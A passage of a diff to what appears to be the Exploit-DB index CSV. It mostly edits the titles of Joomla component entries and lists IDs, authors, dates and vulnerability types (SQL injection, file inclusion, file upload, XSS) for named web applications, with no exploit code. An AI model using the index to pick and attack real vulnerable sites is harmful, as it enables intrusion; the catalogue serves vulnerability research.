12340,platforms/php/webapps/12340.txt,"Joomla! Component 'com_caddy' - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
|
||||
12340,platforms/php/webapps/12340.txt,"Joomla! Component com_caddy - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
|
||||
12345,platforms/php/webapps/12345.txt,"phpGreetCards 3.7 - Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0
|
||||
12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injection",2010-04-22,v3n0m,php,webapps,0
|
||||
12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,php,webapps,0
|
||||
|
|
@ -23045,7 +23046,7 @@ id,file,description,date,author,platform,type,port
|
|||
12428,platforms/php/webapps/12428.txt,"Joomla! Component SmartSite 1.0.0 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12429,platforms/php/webapps/12429.pl,"Joomla! Component ABC 1.1.7 - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12430,platforms/php/webapps/12430.txt,"Joomla! Component Graphics 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
|
||||
12432,platforms/php/webapps/12432.txt,"Joomla! Component com_jesectionfinder - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
|
||||
12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0
|
||||
12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0
|
||||
12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0
|
||||
|
|
@ -23170,7 +23171,7 @@ id,file,description,date,author,platform,type,port
|
|||
12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
|
||||
12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0
|
||||
12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0
|
||||
12615,platforms/php/webapps/12615.txt,"Joomla! Component 'com_camp' - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
|
||||
12615,platforms/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
|
||||
12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0
|
||||
12618,platforms/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0
|
||||
12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0
|
||||
|
|
@ -23181,13 +23182,13 @@ id,file,description,date,author,platform,type,port
|
|||
12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0
|
||||
12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0
|
||||
12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,php,webapps,0
|
||||
12632,platforms/php/webapps/12632.txt,"Joomla! Component 'com_crowdsource' - SQL Injection",2010-05-17,ByEge,php,webapps,0
|
||||
12633,platforms/php/webapps/12633.txt,"Joomla! Component 'com_event' - Multiple Vulnerabilities",2010-05-17,ALTBTA,php,webapps,0
|
||||
12632,platforms/php/webapps/12632.txt,"Joomla! Component com_crowdsource - SQL Injection",2010-05-17,ByEge,php,webapps,0
|
||||
12633,platforms/php/webapps/12633.txt,"Joomla! Component com_event - Multiple Vulnerabilities",2010-05-17,ALTBTA,php,webapps,0
|
||||
12634,platforms/php/webapps/12634.txt,"PHP Gamepage - SQL Injection",2010-05-17,v4lc0m87,php,webapps,0
|
||||
12635,platforms/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection",2010-05-17,Ma3sTr0-Dz,php,webapps,0
|
||||
12636,platforms/php/webapps/12636.txt,"MidiCart PHP/ASP - Arbitrary File Upload",2010-05-17,DigitALL,php,webapps,0
|
||||
12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection / Local File Inclusion / Cross-Site Scripting",2010-05-17,mr_me,php,webapps,0
|
||||
12639,platforms/php/webapps/12639.txt,"Joomla! Component 'com_event' - SQL Injection",2010-05-17,anonymous,php,webapps,0
|
||||
12639,platforms/php/webapps/12639.txt,"Joomla! Component com_event - SQL Injection",2010-05-17,anonymous,php,webapps,0
|
||||
12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 - Cross-Site Request Forgery",2010-05-17,"John Leitch",windows,webapps,0
|
||||
12641,platforms/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,php,webapps,0
|
||||
12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path",2010-05-18,cp77fk4r,php,webapps,0
|
||||
|
|
@ -23196,7 +23197,7 @@ id,file,description,date,author,platform,type,port
|
|||
12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0
|
||||
12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0
|
||||
12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0
|
||||
12648,platforms/php/webapps/12648.txt,"Joomla! Component 'com_packages' - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
|
||||
12648,platforms/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
|
||||
12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - (sukaCMS) Local File Disclosure",2010-05-18,vir0e5,php,webapps,0
|
||||
12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0
|
||||
12656,platforms/php/webapps/12656.txt,"Battle Scrypt - Arbitrary File Upload",2010-05-19,DigitALL,php,webapps,0
|
||||
|
|
@ -23289,7 +23290,7 @@ id,file,description,date,author,platform,type,port
|
|||
12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car 1.0 - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
|
||||
12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
|
||||
12781,platforms/php/webapps/12781.txt,"Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12781,platforms/php/webapps/12781.txt,"Joomla! Component JE Poll - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12782,platforms/php/webapps/12782.txt,"Joomla! Component JE Job 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0
|
||||
12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0
|
||||
|
|
@ -23323,8 +23324,8 @@ id,file,description,date,author,platform,type,port
|
|||
12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
|
||||
12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,asp,webapps,0
|
||||
12842,platforms/php/webapps/12842.txt,"Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12843,platforms/php/webapps/12843.txt,"Joomla! Component 'com_chronocontact' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12842,platforms/php/webapps/12842.txt,"Joomla! Component ChronoConnectivity - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12843,platforms/php/webapps/12843.txt,"Joomla! Component ChronoForms - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12845,platforms/php/webapps/12845.txt,"Vastal I-Tech - SQL Injection",2010-06-02,HELLBOY,php,webapps,0
|
||||
12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,php,webapps,0
|
||||
12849,platforms/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0
|
||||
|
|
@ -23337,7 +23338,7 @@ id,file,description,date,author,platform,type,port
|
|||
12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor - (PHPsetimon) Remote File Inclusion / Local File Inclusion",2010-06-03,eidelweiss,php,webapps,0
|
||||
12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0
|
||||
12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0
|
||||
12868,platforms/php/webapps/12868.txt,"Joomla! Component 'com_lead' - SQL Injection",2010-06-03,ByEge,php,webapps,0
|
||||
12868,platforms/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0
|
||||
30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 - links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
|
||||
18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
|
||||
18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
|
||||
|
|
@ -23380,21 +23381,21 @@ id,file,description,date,author,platform,type,port
|
|||
14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,php,webapps,0
|
||||
13790,platforms/asp/webapps/13790.txt,"iClone - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0
|
||||
14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
|
||||
13792,platforms/php/webapps/13792.txt,"Joomla! Component 'com_cinema' - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
|
||||
13792,platforms/php/webapps/13792.txt,"Joomla! Component cinema - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
|
||||
13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps,0
|
||||
13794,platforms/multiple/webapps/13794.txt,"Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0
|
||||
27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,php,webapps,0
|
||||
27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
|
||||
27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
|
||||
13796,platforms/php/webapps/13796.txt,"Joomla! Component 'com_jstore' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13797,platforms/php/webapps/13797.txt,"Joomla! Component 'com_jtickets' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13798,platforms/php/webapps/13798.txt,"Joomla! Component 'com_jcommunity' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13799,platforms/php/webapps/13799.txt,"Joomla! Component 'com_jmarket' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13800,platforms/php/webapps/13800.txt,"Joomla! Component 'com_jsubscription' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13796,platforms/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13797,platforms/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13798,platforms/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13799,platforms/php/webapps/13799.txt,"Joomla! Component com_jmarket - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13800,platforms/php/webapps/13800.txt,"Joomla! Component com_jsubscription - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13803,platforms/php/webapps/13803.txt,"PHPAccess - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13804,platforms/php/webapps/13804.txt,"Joomla! Component 'com_jnewsletter' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13804,platforms/php/webapps/13804.txt,"Joomla! Component com_jnewsletter - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0
|
||||
13810,platforms/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,php,webapps,0
|
||||
|
|
@ -23461,7 +23462,7 @@ id,file,description,date,author,platform,type,port
|
|||
13912,platforms/php/webapps/13912.txt,"Havij 1.10 - Persistent Cross-Site Scripting",2010-06-17,hexon,php,webapps,0
|
||||
13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0
|
||||
13918,platforms/multiple/webapps/13918.txt,"Spring Framework - Arbitrary code Execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0
|
||||
13922,platforms/php/webapps/13922.txt,"Joomla! Component 'com_joomdocs' - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
|
||||
13922,platforms/php/webapps/13922.txt,"Joomla! Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
|
||||
13923,platforms/php/webapps/13923.txt,"Joomla! Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13925,platforms/php/webapps/13925.txt,"Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13926,platforms/php/webapps/13926.txt,"Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
|
|
@ -23484,8 +23485,8 @@ id,file,description,date,author,platform,type,port
|
|||
13951,platforms/php/webapps/13951.txt,"Joomla! Component 'com_eportfolio' - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0
|
||||
13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS - 'news.php' SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0
|
||||
13954,platforms/php/webapps/13954.txt,"G.CMS Generator - SQL Injection",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13955,platforms/php/webapps/13955.txt,"Joomla! Component 'com_community' - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13956,platforms/php/webapps/13956.txt,"Joomla! Component 'com_jomestate' - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13955,platforms/php/webapps/13955.txt,"Joomla! Component com_community - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13956,platforms/php/webapps/13956.txt,"Joomla! Component com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13957,platforms/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,ALTBTA,php,webapps,0
|
||||
14363,platforms/php/webapps/14363.txt,"Ad Network Script - Persistent Cross-Site Scripting",2010-07-14,Sid3^effects,php,webapps,0
|
||||
14359,platforms/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0
|
||||
|
|
@ -23556,7 +23557,7 @@ id,file,description,date,author,platform,type,port
|
|||
14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,php,webapps,0
|
||||
14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,php,webapps,0
|
||||
14062,platforms/php/webapps/14062.txt,"Joomla! Component 'jeeventcalendar' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14063,platforms/php/webapps/14063.txt,"Joomla! Component 'com_jejob' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14063,platforms/php/webapps/14063.txt,"Joomla! Component com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14064,platforms/php/webapps/14064.txt,"Joomla! Component jesectionfinder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
|
||||
14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0
|
||||
|
|
@ -23598,7 +23599,7 @@ id,file,description,date,author,platform,type,port
|
|||
14149,platforms/asp/webapps/14149.txt,"Setiran CMS - Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps,0
|
||||
14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - 'post.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
|
||||
14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - 'forumdisplay.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
|
||||
14154,platforms/php/webapps/14154.txt,"Joomla! Component 'com_dateconverter' 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
|
||||
14154,platforms/php/webapps/14154.txt,"Joomla! Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
|
||||
14155,platforms/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps,0
|
||||
14209,platforms/php/webapps/14209.txt,"Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0
|
||||
|
|
@ -23632,7 +23633,7 @@ id,file,description,date,author,platform,type,port
|
|||
14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
|
||||
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
|
||||
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
|
||||
14207,platforms/php/webapps/14207.txt,"Joomla! Component 'com_phocagallery' - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
|
||||
14207,platforms/php/webapps/14207.txt,"Joomla! Component Phoca Gallery 2.7.3 - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
|
||||
14210,platforms/php/webapps/14210.txt,"Joomla! Component Address Book - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14211,platforms/php/webapps/14211.txt,"Joomla! Component NinjaMonials - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14213,platforms/php/webapps/14213.txt,"Joomla! Component 'com_sef' - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
|
||||
|
|
@ -23648,7 +23649,7 @@ id,file,description,date,author,platform,type,port
|
|||
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - 'articlesdetails.php' SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
|
||||
14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
|
||||
33410,platforms/php/webapps/33410.txt,"Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection",2009-12-16,"Justin C. Klein Keane",php,webapps,0
|
||||
14232,platforms/php/webapps/14232.txt,"Joomla! Component 'com_jpodium' - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
|
||||
14232,platforms/php/webapps/14232.txt,"Joomla! Component JPodium 2.7.3 - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
|
||||
14233,platforms/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
|
||||
14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web Application Vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0
|
||||
14238,platforms/php/webapps/14238.txt,"BS Auction - SQL Injection",2010-07-06,"Easy Laster",php,webapps,0
|
||||
|
|
@ -23681,7 +23682,7 @@ id,file,description,date,author,platform,type,port
|
|||
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,php,webapps,0
|
||||
14293,platforms/php/webapps/14293.txt,"Joomla! Component 'Minify4Joomla' - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0
|
||||
14291,platforms/php/webapps/14291.txt,"Joomla! Component 'IXXO Cart' - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0
|
||||
14434,platforms/php/webapps/14434.txt,"Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
|
||||
14434,platforms/php/webapps/14434.txt,"Joomla! Component com_jomtube - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
|
||||
14312,platforms/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection",2010-07-10,v3n0m,php,webapps,0
|
||||
14296,platforms/php/webapps/14296.txt,"Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0
|
||||
14316,platforms/php/webapps/14316.pl,"PHP-Nuke 8.0 -Web_Links Module - Blind SQL Injection",2010-07-10,yawn,php,webapps,0
|
||||
|
|
@ -23689,8 +23690,8 @@ id,file,description,date,author,platform,type,port
|
|||
14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0
|
||||
14308,platforms/php/webapps/14308.txt,"WordPress Plugin Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0
|
||||
14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80
|
||||
14313,platforms/php/webapps/14313.txt,"Joomla! Component 'com_myhome' - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14315,platforms/php/webapps/14315.txt,"Joomla! Component 'com_mysms' - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14313,platforms/php/webapps/14313.txt,"Joomla! Component MyHome - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14315,platforms/php/webapps/14315.txt,"Joomla! Component MySMS - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14335,platforms/php/webapps/14335.txt,"Joomla! Component 'healthstats' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
|
||||
14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
|
||||
14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution",2010-07-10,yawn,php,webapps,0
|
||||
|
|
@ -23764,7 +23765,7 @@ id,file,description,date,author,platform,type,port
|
|||
14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0
|
||||
14448,platforms/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
|
||||
14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14450,platforms/php/webapps/14450.txt,"Joomla! Component 'com_iproperty' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
|
||||
14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
|
||||
14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 - faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0
|
||||
|
|
@ -23773,7 +23774,7 @@ id,file,description,date,author,platform,type,port
|
|||
14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent Cross-Site Scripting",2010-07-24,K053,php,webapps,0
|
||||
14461,platforms/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps,0
|
||||
14462,platforms/php/webapps/14462.txt,"Joomla! Component Ozio Gallery - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0
|
||||
14463,platforms/php/webapps/14463.txt,"Joomla! Component 'com_itarmory' - SQL Injection",2010-07-24,Craw,php,webapps,0
|
||||
14463,platforms/php/webapps/14463.txt,"Joomla! Component com_itarmory - SQL Injection",2010-07-24,Craw,php,webapps,0
|
||||
14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0
|
||||
14466,platforms/php/webapps/14466.txt,"Joomla! Component Joomdle 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
|
||||
14467,platforms/php/webapps/14467.txt,"Joomla! Component YouTube 1.5 - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0
|
||||
|
|
@ -23812,7 +23813,7 @@ id,file,description,date,author,platform,type,port
|
|||
14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
|
||||
14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0
|
||||
14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
|
||||
14570,platforms/php/webapps/14570.txt,"Joomla! Component 'com_neorecruit' 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
|
||||
14570,platforms/php/webapps/14570.txt,"Joomla! Component NeoRecruit 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
|
||||
14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0
|
||||
14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0
|
||||
14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0
|
||||
|
|
@ -23840,14 +23841,14 @@ id,file,description,date,author,platform,type,port
|
|||
